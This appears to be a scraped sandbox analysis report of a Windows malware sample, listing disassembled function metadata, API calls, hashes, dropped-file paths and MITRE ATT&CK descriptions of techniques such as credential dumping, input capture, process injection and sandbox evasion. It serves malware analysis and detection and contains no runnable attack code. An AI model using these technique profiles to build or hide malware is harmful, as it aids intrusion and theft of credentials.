EA06, xrefs: 004A8DF3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 05a409ee45812d6032856300c2183a4d4201fa338b39d0477a0def7135f184ce
Instruction ID: c5431ec24b286002fd0be4fefb8833ce301e0f7deaada92860f2740c91d014c0
Opcode Fuzzy Hash: 05a409ee45812d6032856300c2183a4d4201fa338b39d0477a0def7135f184ce
Instruction Fuzzy Hash: E3012D71C042187EDB18DBA9CC16EFE7BF8DB21301F00459FF552D2181E879E6048764

Function 00498CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 0049AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0049AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00498D6B

Strings

ComboBox, xrefs: 00498D0A
ListBox, xrefs: 00498D35

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c371d01fd7347e9abf9d898877fb7a78b1d6e00c3428ba8ec2b9630f33672355
Instruction ID: 9ff9ece171886881179fec6ad5e405cd8fa3f8b870e540ccb9c1f15f6b8f57ff
Opcode Fuzzy Hash: c371d01fd7347e9abf9d898877fb7a78b1d6e00c3428ba8ec2b9630f33672355
Instruction Fuzzy Hash: DD01D4B1A41109ABEF14EBE5C952EFF7BA89F16340F10012FB801632D2DE1C5E08D2B9

Function 00498D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 0049AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0049AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00498DEE

Strings

ComboBox, xrefs: 00498D8F
ListBox, xrefs: 00498DBA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fb3580a0075b895a8fa2dba8d8ed0948afc169d7f9392139be42564e78a161cb
Instruction ID: 022644d8925e7b4f5908a32d130b021464457b04141c09eb6beb375524583887
Opcode Fuzzy Hash: fb3580a0075b895a8fa2dba8d8ed0948afc169d7f9392139be42564e78a161cb
Instruction Fuzzy Hash: 3901A7B1A41109A7EF11E6E5C946EFF7BA99F16340F10012FB80563293DE1D4E19D279

Function 0049C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0049C534

Part of subcall function 0049C816: _memmove.LIBCMT ref: 0049C860
Part of subcall function 0049C816: VariantInit.OLEAUT32(00000000), ref: 0049C882
Part of subcall function 0049C816: VariantCopy.OLEAUT32(00000000,?), ref: 0049C88C

VariantClear.OLEAUT32(?), ref: 0049C556

Strings

d}O, xrefs: 0049C517

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}O
API String ID: 2932060187-3429753172
Opcode ID: ac77e5f12183e5d86f7d8dab153ec2a912d1a9913ec75226979865076b5b5965
Instruction ID: 39ce99d52ab9affc7ea80356c52d4dee3236dd691a96aaf716357d88bee1e94c
Opcode Fuzzy Hash: ac77e5f12183e5d86f7d8dab153ec2a912d1a9913ec75226979865076b5b5965
Instruction Fuzzy Hash: E711FEB19007089FC710DF9AD8C489BB7F8FB18314B50852FE58A97611D775AA48CB54

Function 004A4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 004A4F46
_wcscmp.LIBCMT ref: 004A4F58

Strings

#32770, xrefs: 004A4F52

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: f956b70d283d32d2342d3d54fdb1731255455eb0194c9a77eac32de8a122b9f8
Instruction ID: 817ecd2d0c7eab57cc03b7219d4930856cbd8ba6243d0782f9f906e4f52aa81d
Opcode Fuzzy Hash: f956b70d283d32d2342d3d54fdb1731255455eb0194c9a77eac32de8a122b9f8
Instruction Fuzzy Hash: 4DE02B325002282BD3109B559C05FA7F7ACDB95B21F00002BFD00D7041E5649A0587D4

Function 0047B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0047B314: _memset.LIBCMT ref: 0047B321

Part of subcall function 00460940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0047B2F0,?,?,?,0044100A), ref: 00460945

IsDebuggerPresent.KERNEL32(?,?,?,0044100A), ref: 0047B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0044100A), ref: 0047B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0047B2FE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: e9fc6dd382d7651a0872e709945b4a1f458d289c0be710496dca9f0bd512aa76
Instruction ID: 8ee44fb8c8ebfd627562488245adb16a0e4b9da05ea4c7147a5611accc93c2d6
Opcode Fuzzy Hash: e9fc6dd382d7651a0872e709945b4a1f458d289c0be710496dca9f0bd512aa76
Instruction Fuzzy Hash: 56E06D70200B518BE7609F29E5047867AE8EF00308F00CA7EE84AC7350EBBCD448CBA9

Function 00481935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00481775

Part of subcall function 004BBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0048195E,?), ref: 004BBFFE
Part of subcall function 004BBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004BC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0048196D

Strings

WIN_XPe, xrefs: 00481788

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: fc2e7cf40c00314fe1a336d4900c1ec93b0ce4866c9daf67b1680eaa0129ce94
Instruction ID: 3b318d2088e9c98ae1dfbb268030244657968dc02a3ee03d75ae2454720a5ee7
Opcode Fuzzy Hash: fc2e7cf40c00314fe1a336d4900c1ec93b0ce4866c9daf67b1680eaa0129ce94
Instruction Fuzzy Hash: C9F0C970801109DFDB55EB91C984AEDBBF8AB18305F54089BE102A21A0DB794F8ADF69

Function 004C5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004C596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004C5981

Part of subcall function 004A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004A52BC

Strings

Shell_TrayWnd, xrefs: 004C5967

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ac039f8e2a5ef7b535a2af2d0d0acfe8bb096c47be57029a2b88fe5211e4fc5a
Instruction ID: 06ca8b671899d658cd22562a1054890745aea6bd3f27c62cbe95a88401b51f94
Opcode Fuzzy Hash: ac039f8e2a5ef7b535a2af2d0d0acfe8bb096c47be57029a2b88fe5211e4fc5a
Instruction Fuzzy Hash: 6CD01232384711B7E6A4BB709C0FFE76A25BF10B54F10083AB34AAE1D1C9EC9804CA5C

Function 004C5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004C59AE
PostMessageW.USER32(00000000), ref: 004C59B5

Part of subcall function 004A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004A52BC

Strings

Shell_TrayWnd, xrefs: 004C59A7

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9f739b78da14370ac616db73947a20e4935f2038796c70840c787f455548edfd
Instruction ID: 80b7723cc707dde698f3cf005e6aec477d77ffae225d2674c5d0eabf38ff8ddd
Opcode Fuzzy Hash: 9f739b78da14370ac616db73947a20e4935f2038796c70840c787f455548edfd
Instruction Fuzzy Hash: 8DD0C9323807117BE6A4AB709C0BF966625AB15B54F10083AB346AA1D1C9E8A804CA5C

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AxKxwW9WGa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\10O4645j

C:\Users\user\AppData\Local\Temp\aut8F84.tmp

C:\Users\user\AppData\Local\Temp\molecast

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
AxKxwW9WGa.exe

Function 00443B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 004449A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00444E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 004A9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00443015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Function 00443041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0044708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00443633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00443A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00443766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0044F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 00B07AF8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 004439D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00B07898 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
fileCOMMON

Function 0044407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

